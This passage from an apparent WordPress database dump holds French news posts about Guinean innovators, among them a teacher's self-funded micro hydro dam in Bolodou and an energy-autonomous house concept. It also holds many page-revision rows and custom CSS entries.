m\'a cru. J\'ai économisé assez d\'argent pour financer mon projet qui, aujourd\'hui, profite à tous<footer>Ibrahima Tounkara, Enseignant de Mathématiques</footer></blockquote>\r\n</div>\r\n</aside>Son projet a été réalisé sur fonds propres. Les travaux lui ont couté environ 50 millions de francs guinéens (environ 3 millions de FCFA).\r\n\r\n<img class=\"alignnone size-medium wp-image-833\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/97723064_img_20170730_131943-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" />\r\n\r\n\"Quand j\'ai dit aux villageois que je comptais réaliser un mini-barrage hydroélectrique, personne ne m\'a cru. J\'ai commencé par vendre des panneaux solaires. J\'ai économisé assez d\'argent pour financer mon projet, confie-t-il.\r\n\r\nIbrahima n\'y connaissait presque rien en hydraulique. Pour réaliser son mini-barrage, il a fait des recherches essentiellement sur Google.\r\n\r\n\"Je l\'ai d\'abord fait pour ma famille. Je savais que mes parents n\'avaient pas d\'électricité chez eux et je me suis dit qu\'il fallait faire quelque chose, ne serait-ce que pour avoir de quoi charger leurs téléphones\", explique Ibrahima.\r\n\r\nAujourd\'hui, le mini-barrage de Ibrahima Tounkara illumine pas moins de 90 foyers sur environ 94 que compte le village.\r\n\r\nSelon les chiffres de la Banque mondiale, \"un Africain sur deux n\'a pas accès à l\'électricité. De plus en plus, les énergies renouvelables et mini-réseaux s\'avèrent être des pistes prometteuses, pour l\'heure insuffisantes.','Electricité: un homme construit un micro-barrage de 9KVA dans une localité de Guéckédou','','publish','open','open','','electricite-un-homme-invente-un-micro-barrage-de-9kva-dans-une-localite-de-gueckedou','','','2017-11-01 13:17:01','2017-11-01 13:17:01','',0,'https://guineeinnove.nimbasolution.com/?p=405',0,'post','',0),(407,1,'2017-10-24 13:45:12','2017-10-24 13:45:12','Ibrahima Tounkara est professeur de Mathématiques  au lycée ‘’Professeur Alpha Condé’’ de Kissidougou. Sur fonds propres, il est parvenu à réaliser un micro-barrage dans la sous-préfecture de Bolodou, située à 65km de la commune urbaine de Gueckédou.\r\n\r\nIbrahima Tounkara est professeur de Mathématiques  au lycée ‘’Professeur Alpha Condé’’ de Kissidougou. Sur fonds propres, il est parvenu à réaliser un micro-barrage dans la sous-préfecture de Bolodou, située à 65km de la commune urbaine de Gueckédou.\r\n\r\n<img class=\"size-medium wp-image-12269 alignleft td-animation-stack-type0-1\" src=\"https://guineenews.org/wp-content/uploads/2017/08/FB_IMG_14889784830648354-169x300.jpg\" sizes=\"(max-width: 169px) 100vw, 169px\" srcset=\"https://guineenews.org/wp-content/uploads/2017/08/FB_IMG_14889784830648354-169x300.jpg 169w, https://guineenews.org/wp-content/uploads/2017/08/FB_IMG_14889784830648354-575x1024.jpg 575w, https://guineenews.org/wp-content/uploads/2017/08/FB_IMG_14889784830648354-236x420.jpg 236w, https://guineenews.org/wp-content/uploads/2017/08/FB_IMG_14889784830648354.jpg 674w\" alt=\"\" width=\"169\" height=\"300\" />Interrogé par notre reporter, il a expliqué comment il a pu réaliser ce projet. « Je n’ai pas fait des années pour réaliser ce projet. C’est à partir  de l’installation des panneaux solaires que j’ai eu le goût du courant. J’ai envoyé pour mon grand frère qui résidait à Bolodou, notre village natal, un panneau solaire pour faire la charge des téléphones. Après, j’ai constaté que la consommation est très limitée. On ne peut pas encore distribuer ce courant à beaucoup de clients. Maintenant, j’ai jugé nécessaire de construire ce micro-barrage », a-t-il expliqué.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<img class=\"size-medium wp-image-12271 alignleft td-animation-stack-type0-1\" src=\"https://guineenews.org/wp-content/uploads/2017/08/IMG_20170406_181358-169x300.jpg\" sizes=\"(max-width: 169px) 100vw, 169px\" srcset=\"https://guineenews.org/wp-content/uploads/2017/08/IMG_20170406_181358-169x300.jpg 169w, https://guineenews.org/wp-content/uploads/2017/08/IMG_20170406_181358-576x1024.jpg 576w, https://guineenews.org/wp-content/uploads/2017/08/IMG_20170406_181358-236x420.jpg 236w, https://guineenews.org/wp-content/uploads/2017/08/IMG_20170406_181358.jpg 675w\" alt=\"\" width=\"169\" height=\"300\" />A propos des phases de construction de l’ouvrage, il a dit ceci : « j’ai commencé à faire des  recherches à partir du mois de mars 2016. Et j’ai terminé cette phase au mois de septembre 2016. J’ai commencé à travailler sur le site au mois de novembre. Et au mois de mai 2017, on a pu livrer le courant à la population de Bolodou. » Il a par ailleurs donné le nombre d’abonnés à ce jour et lancé un appel au gouvernement, aux ONG et aux personnes de bonne volonté. « On a plus de 80 abonnés. Vous savez, les villageois n’ont besoin que des lampes. Donc on arrive à les fournir sans problème. Notre production est de 9kVA.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<img class=\"size-medium wp-image-12272 alignleft td-animation-stack-type0-1\" src=\"https://guineenews.org/wp-content/uploads/2017/08/IMG_20170602_165256-169x300.jpg\" sizes=\"(max-width: 169px) 100vw, 169px\" srcset=\"https://guineenews.org/wp-content/uploads/2017/08/IMG_20170602_165256-169x300.jpg 169w, https://guineenews.org/wp-content/uploads/2017/08/IMG_20170602_165256-576x1024.jpg 576w, https://guineenews.org/wp-content/uploads/2017/08/IMG_20170602_165256-236x420.jpg 236w, https://guineenews.org/wp-content/uploads/2017/08/IMG_20170602_165256.jpg 675w\" alt=\"\" width=\"169\" height=\"300\" />Je sollicite auprès du gouvernement, des ONG et des personnes de bonne volonté  un soutien dans cette action. J’ai réalisé ce travail avec de petits moyens. Je n’avais pas de moyens pour acheter des tuyaux de pression et j’ai fait la conduite d’eau avec du béton armé. La conduite forcée n’est pas si résistante et je vois même des erreurs actuellement. Chaque fois, je suis obligé de colmater et la production du courant ne doit pas dépasser les 9 KVA», a-t-il plaidé. Il demande au gouvernement  de l’aider  à étendre ses actions à d’autres Communes rurales de Guinée, parce que la population a besoin du courant pour travailler et s’épanouir.','Electricité: un homme invente un micro-barrage de 9KVA dans une localité de Guéckédou','','inherit','closed','closed','','405-revision-v1','','','2017-10-24 13:45:12','2017-10-24 13:45:12','',405,'https://guineeinnove.nimbasolution.com/2017/10/24/405-revision-v1/',0,'revision','',0),(408,1,'2017-10-24 13:45:46','2017-10-24 13:45:46','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 13:45:46','2017-10-24 13:45:46','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(409,1,'2017-10-24 14:14:31','2017-10-24 14:14:31','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 14:14:31','2017-10-24 14:14:31','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(410,1,'2017-10-24 14:15:29','2017-10-24 14:15:29','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 14:15:29','2017-10-24 14:15:29','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(411,1,'2017-10-24 14:24:38','2017-10-24 14:24:38','Diallo Thierno Mamadou Djan, concepteur d\'une maquette, d\'un feu de croisement intelligent est reçu par le DG de l\' Agence de Promotion des Investissements Privés.\r\n\r\n<img class=\"alignnone size-full wp-image-829\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/feu.jpg\" alt=\"\" width=\"290\" height=\"174\" />','Diallo Thierno Mamadou Djan, concepteur d\'une maquette, d\'un feu de croisement intelligent','','publish','open','open','','diallo-thierno-mamadou-djan-concepteur-dune-maquette-dun-feu-de-croisement-intelligent','','','2017-11-01 16:04:51','2017-11-01 16:04:51','',0,'https://guineeinnove.nimbasolution.com/?p=411',0,'post','',0),(413,1,'2017-10-24 14:24:38','2017-10-24 14:24:38','Diallo Thierno Mamadou Djan, concepteur d\'une maquette, d\'un feu de croisement intelligent est reçu par le DG de l\' Agence de Promotion des Investissements Privés','Diallo Thierno Mamadou Djan, concepteur d\'une maquette, d\'un feu de croisement intelligent','','inherit','closed','closed','','411-revision-v1','','','2017-10-24 14:24:38','2017-10-24 14:24:38','',411,'https://guineeinnove.nimbasolution.com/2017/10/24/411-revision-v1/',0,'revision','',0),(414,1,'2017-10-24 14:27:01','2017-10-24 14:27:01','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 14:27:01','2017-10-24 14:27:01','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(415,1,'2017-10-24 14:30:59','2017-10-24 14:30:59','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 14:30:59','2017-10-24 14:30:59','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(416,1,'2017-10-24 14:36:41','2017-10-24 14:36:41','&nbsp;\r\n\r\nMoustapha Haidara est un jeune architecte Guinéen, considéré par ses pairs comme le meilleur de tous. Il a crée un concept de maison particulièrement innovant ayant des caractéristiques particulière:\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-768x432.jpg\" sizes=\"(max-width: 768px) 100vw, 768px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte.jpg 960w\" alt=\"\" width=\"768\" height=\"432\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-768x432.jpg\" sizes=\"(max-width: 768px) 100vw, 768px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg 960w\" alt=\"\" width=\"768\" height=\"432\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg\" sizes=\"(max-width: 366px) 100vw, 366px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg 366w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3-300x169.jpg 300w\" alt=\"\" width=\"366\" height=\"206\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-768x432.jpg\" sizes=\"(max-width: 768px) 100vw, 768px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg 960w\" alt=\"\" width=\"768\" height=\"432\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-768x432.jpg\" sizes=\"(max-width: 768px) 100vw, 768px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg 960w\" alt=\"\" width=\"768\" height=\"432\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-768x432.jpg\" sizes=\"(max-width: 768px) 100vw, 768px\" srcset=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-768x432.jpg 768w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-300x169.jpg 300w, https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg 960w\" alt=\"\" width=\"768\" height=\"432\" /></a></figure>\r\n-<strong>Toit en bois:</strong> avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'énergie d\'origine éolienne pour la maison.\r\n\r\n-<strong>Triple vitrage: </strong>rempli d\'argon de gaz très isolent et des capteurs solaires permettant ainsi à la maison d\'avoir une seconde source d’énergie en plus de l’énergie d\'origine éolienne.\r\n\r\n<strong>-Mur en lambris de bois: </strong>le bois économise de l’énergie, c\'est un excellent isolant.\r\n\r\n<strong>-Mur en lambris de bois:  </strong>économise de l’énergie et conserve la fraîcheur.\r\n\r\n<strong>-Végétation persistante:</strong> Afin d\'éviter les déperditions dues au vent.','Un architecte Guinéen crée un concept de maison autonome en Energie!','','publish','open','open','','un-architecte-guineen-cree-un-concept-de-maison-autonome-en-energie','','','2017-10-31 15:39:03','2017-10-31 15:39:03','',0,'https://guineeinnove.nimbasolution.com/?p=416',0,'post','',1),(418,1,'2017-10-24 14:36:41','2017-10-24 14:36:41','','Un architecte Guinéen crée un concept de maison autonome en Energie!','','inherit','closed','closed','','416-revision-v1','','','2017-10-24 14:36:41','2017-10-24 14:36:41','',416,'https://guineeinnove.nimbasolution.com/2017/10/24/416-revision-v1/',0,'revision','',0),(419,1,'2017-10-24 14:37:40','2017-10-24 14:37:40','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 14:37:40','2017-10-24 14:37:40','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(429,1,'2017-10-24 19:31:47','2017-10-24 19:31:47','#header .logo-image, #header .logo-title {\n    padding-top: 0px;\n}\n.page-title-wrap h3 {\n    margin-bottom: 0;\n    margin-top: 10px;\n}\n.page-title {\n    background-color: #ffffff;\n    padding: 0px 0;\n}\n.wrapper-space {\n    padding: 0px 0;\n}\n.logo {\n	height: 0px;\n}\n','magzma','','publish','closed','closed','','magzma','','','2017-11-07 15:30:00','2017-11-07 15:30:00','',0,'https://guineeinnove.nimbasolution.com/2017/10/24/magzma/',0,'custom_css','',0),(430,1,'2017-10-24 19:31:47','2017-10-24 19:31:47','#header .logo-image, #header .logo-title {\n    padding-top: 0px;\n}','magzma','','inherit','closed','closed','','429-revision-v1','','','2017-10-24 19:31:47','2017-10-24 19:31:47','',429,'https://guineeinnove.nimbasolution.com/2017/10/24/429-revision-v1/',0,'revision','',0),(433,1,'2017-10-24 20:42:54','2017-10-24 20:42:54','\n			<h2>Technlogie</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 20:42:54','2017-10-24 20:42:54','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(434,1,'2017-10-24 20:44:00','2017-10-24 20:44:00','\n			<h2>Technlogie</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 20:44:00','2017-10-24 20:44:00','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(435,1,'2017-10-24 20:45:25','2017-10-24 20:45:25','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 20:45:25','2017-10-24 20:45:25','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(436,1,'2017-10-24 20:47:18','2017-10-24 20:47:18','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 20:47:18','2017-10-24 20:47:18','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(437,1,'2017-10-24 22:11:33','2017-10-24 22:11:33','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 22:11:33','2017-10-24 22:11:33','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(438,1,'2017-10-24 22:12:37','2017-10-24 22:12:37','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 22:12:37','2017-10-24 22:12:37','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(439,1,'2017-10-24 22:13:48','2017-10-24 22:13:48','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 22:13:48','2017-10-24 22:13:48','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(440,1,'2017-10-24 23:45:41','2017-10-24 23:45:41','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-24 23:45:41','2017-10-24 23:45:41','',360,'https://guineeinnove.nimbasolution.com/2017/10/24/360-revision-v1/',0,'revision','',0),(441,1,'2017-10-25 00:35:26','2017-10-25 00:35:26','','TECHNOLOGIE','','inherit','closed','closed','','2-revision-v1','','','2017-10-25 00:35:26','2017-10-25 00:35:26','',2,'https://guineeinnove.nimbasolution.com/2017/10/25/2-revision-v1/',0,'revision','',0),(442,1,'2017-10-25 00:37:04','2017-10-25 00:37:04','','TECHNOLOGIE','','inherit','closed','closed','','2-revision-v1','','','2017-10-25 00:37:04','2017-10-25 00:37:04','',2,'https://guineeinnove.nimbasolution.com/2017/10/25/2-revision-v1/',0,'revision','',0),(444,1,'2017-10-25 00:49:59','2017-10-25 00:49:59','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 00:49:59','2017-10-25 00:49:59','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(445,1,'2017-10-25 00:52:26','2017-10-25 00:52:26','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 00:52:26','2017-10-25 00:52:26','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(446,1,'2017-10-25 00:55:10','2017-10-25 00:55:10','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 00:55:10','2017-10-25 00:55:10','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(447,1,'2017-10-25 00:57:00','2017-10-25 00:57:00','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 00:57:00','2017-10-25 00:57:00','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(448,1,'2017-10-25 00:57:16','2017-10-25 00:57:16','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 00:57:16','2017-10-25 00:57:16','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(449,1,'2017-10-25 01:03:43','2017-10-25 01:03:43','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 01:03:43','2017-10-25 01:03:43','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(450,1,'2017-10-25 01:05:52','2017-10-25 01:05:52','','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 01:05:52','2017-10-25 01:05:52','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(451,1,'2017-10-25 01:08:30','2017-10-25 01:08:30','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:08:30','2017-10-25 01:08:30','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(452,1,'2017-10-25 01:09:02','2017-10-25 01:09:02','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:09:02','2017-10-25 01:09:02','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(453,1,'2017-10-25 01:09:33','2017-10-25 01:09:33','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:09:33','2017-10-25 01:09:33','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(454,1,'2017-10-25 01:11:17','2017-10-25 01:11:17','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:11:17','2017-10-25 01:11:17','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(455,1,'2017-10-25 01:13:45','2017-10-25 01:13:45','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:13:45','2017-10-25 01:13:45','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(456,1,'2017-10-25 01:17:13','2017-10-25 01:17:13','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:17:13','2017-10-25 01:17:13','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(457,1,'2017-10-25 01:18:29','2017-10-25 01:18:29','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:18:29','2017-10-25 01:18:29','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(458,1,'2017-10-25 01:18:47','2017-10-25 01:18:47','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:18:47','2017-10-25 01:18:47','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(459,1,'2017-10-25 01:32:28','2017-10-25 01:32:28','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:32:28','2017-10-25 01:32:28','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(460,1,'2017-10-25 01:33:41','2017-10-25 01:33:41','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:33:41','2017-10-25 01:33:41','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(461,1,'2017-10-25 01:35:05','2017-10-25 01:35:05','\n			<h2>Technlogie</h2>		\n			<h2>Agriculture</h2>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 01:35:05','2017-10-25 01:35:05','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(462,1,'2017-10-25 06:05:03','2017-10-25 06:05:03','https://www.youtube.com/watch?v=qV8zMH-qeBc		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:05:03','2017-10-25 06:05:03','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(463,1,'2017-10-25 06:08:53','2017-10-25 06:08:53','https://www.youtube.com/watch?v=qV8zMH-qeBc','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:08:53','2017-10-25 06:08:53','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(464,1,'2017-10-25 06:10:16','2017-10-25 06:10:16','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:10:16','2017-10-25 06:10:16','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(465,1,'2017-10-25 06:25:22','2017-10-25 06:25:22','','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:25:22','2017-10-25 06:25:22','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(467,1,'2017-10-25 06:28:48','2017-10-25 06:28:48','#header .logo-image, #header .logo-title {\n    padding-top: 0px;\n}\n.page-title-wrap h3 {\n    margin-bottom: 0;\n    margin-top: 10px;\n}\n\n','magzma','','inherit','closed','closed','','429-revision-v1','','','2017-10-25 06:28:48','2017-10-25 06:28:48','',429,'https://guineeinnove.nimbasolution.com/2017/10/25/429-revision-v1/',0,'revision','',0),(469,1,'2017-10-25 06:30:05','2017-10-25 06:30:05','#header .logo-image, #header .logo-title {\n    padding-top: 0px;\n}\n.page-title-wrap h3 {\n    margin-bottom: 0;\n    margin-top: 10px;\n}\n.page-title {\n    background-color: #ffffff;\n    padding: 0px 0;\n}\n\n','magzma','','inherit','closed','closed','','429-revision-v1','','','2017-10-25 06:30:05','2017-10-25 06:30:05','',429,'https://guineeinnove.nimbasolution.com/2017/10/25/429-revision-v1/',0,'revision','',0),(471,1,'2017-10-25 06:32:32','2017-10-25 06:32:32','#header .logo-image, #header .logo-title {\n    padding-top: 0px;\n}\n.page-title-wrap h3 {\n    margin-bottom: 0;\n    margin-top: 10px;\n}\n.page-title {\n    background-color: #ffffff;\n    padding: 0px 0;\n}\n.wrapper-space {\n    padding: 0px 0;\n}\n\n','magzma','','inherit','closed','closed','','429-revision-v1','','','2017-10-25 06:32:32','2017-10-25 06:32:32','',429,'https://guineeinnove.nimbasolution.com/2017/10/25/429-revision-v1/',0,'revision','',0),(472,1,'2017-10-25 06:41:18','2017-10-25 06:41:18','\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:41:18','2017-10-25 06:41:18','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(473,1,'2017-10-25 06:42:32','2017-10-25 06:42:32','\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:42:32','2017-10-25 06:42:32','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(474,1,'2017-10-25 06:43:34','2017-10-25 06:43:34','\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:43:34','2017-10-25 06:43:34','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(475,1,'2017-10-25 06:44:11','2017-10-25 06:44:11','\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:44:11','2017-10-25 06:44:11','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(476,1,'2017-10-25 06:45:06','2017-10-25 06:45:06','\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:45:06','2017-10-25 06:45:06','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(477,1,'2017-10-25 06:46:23','2017-10-25 06:46:23','\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:46:23','2017-10-25 06:46:23','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(478,1,'2017-10-25 06:49:17','2017-10-25 06:49:17','\n			<h3>Populaires</h3>		\n		https://www.youtube.com/watch?v=9uOETcuFjbE		\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:49:17','2017-10-25 06:49:17','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(479,1,'2017-10-25 06:58:55','2017-10-25 06:58:55','\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:58:55','2017-10-25 06:58:55','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(480,1,'2017-10-25 06:59:57','2017-10-25 06:59:57','\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 06:59:57','2017-10-25 